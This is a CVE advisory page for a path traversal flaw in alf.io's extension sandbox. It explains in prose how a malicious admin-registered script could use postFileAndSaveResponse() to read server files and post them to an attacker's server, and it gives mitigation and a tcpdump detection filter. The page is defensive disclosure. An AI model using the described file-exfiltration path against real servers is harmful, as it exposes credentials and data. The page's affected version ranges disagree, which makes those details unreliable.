CVE-2026-41412
Path Traversal in alf.io Ticket System
Publication date: 2026-06-02
Last updated on: 2026-06-03
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| alf.io | alf.io | to 2.0-M5-2606 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-73 | The product allows user input to control or influence paths or file names that are used in filesystem operations. |
| CWE-22 | The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
The vulnerability exists in alf.io, an open source ticket reservation system. Before version 2.0-M5-2606, the alf.io extension sandbox injects a fully-functional HTTP client into every extension script's scope. One method, postFileAndSaveResponse(), accepts a file path parameter and reads the file contents without validating the path or restricting directory access. This allows a malicious extension script to read any file accessible to the JVM process user and send its contents to an attacker-controlled server via HTTP POST.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
This vulnerability allows a malicious extension script to read any file accessible to the JVM process user and exfiltrate it to an attacker-controlled server. Such unauthorized access and potential data exfiltration could lead to breaches of sensitive or personal data.
As a result, this vulnerability may impact compliance with data protection standards and regulations such as GDPR and HIPAA, which require strict controls over access to and protection of personal and sensitive information.
How can this vulnerability impact me? :
This vulnerability can lead to unauthorized disclosure of sensitive files on the server running alf.io. An attacker who can run a malicious extension script can read arbitrary files accessible by the JVM user and exfiltrate their contents to an external server. This could expose confidential information, credentials, or other sensitive data, potentially leading to further compromise or data breaches.
What immediate steps should I take to mitigate this vulnerability?
To mitigate this vulnerability, upgrade alf.io to version 2.0-M5-2606 or later, where the issue has been patched.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detection of this vulnerability involves identifying whether the alf.io system is running a vulnerable version (versions β€ 2.0-M5-2509-1) and if any malicious extension scripts are using the simpleHttpClient.postFileAndSaveResponse() method to read arbitrary files and exfiltrate data.
Since the vulnerability requires an authenticated administrator to register malicious extension scripts, monitoring for unusual or unauthorized extension scripts or suspicious HTTP POST requests to external servers can help detect exploitation attempts.
Suggested commands or approaches include:
- Check the alf.io version installed to confirm if it is vulnerable.
- Monitor HTTP POST traffic from the alf.io server to unknown or suspicious external IP addresses or domains using network monitoring tools like tcpdump or Wireshark.
- Example tcpdump command to capture HTTP POST requests: tcpdump -i <interface> 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'
- Inspect the extension scripts registered in alf.io for any unauthorized or suspicious scripts that invoke simpleHttpClient.postFileAndSaveResponse().
- Review application logs for any calls to postFileAndSaveResponse() or unusual file access patterns.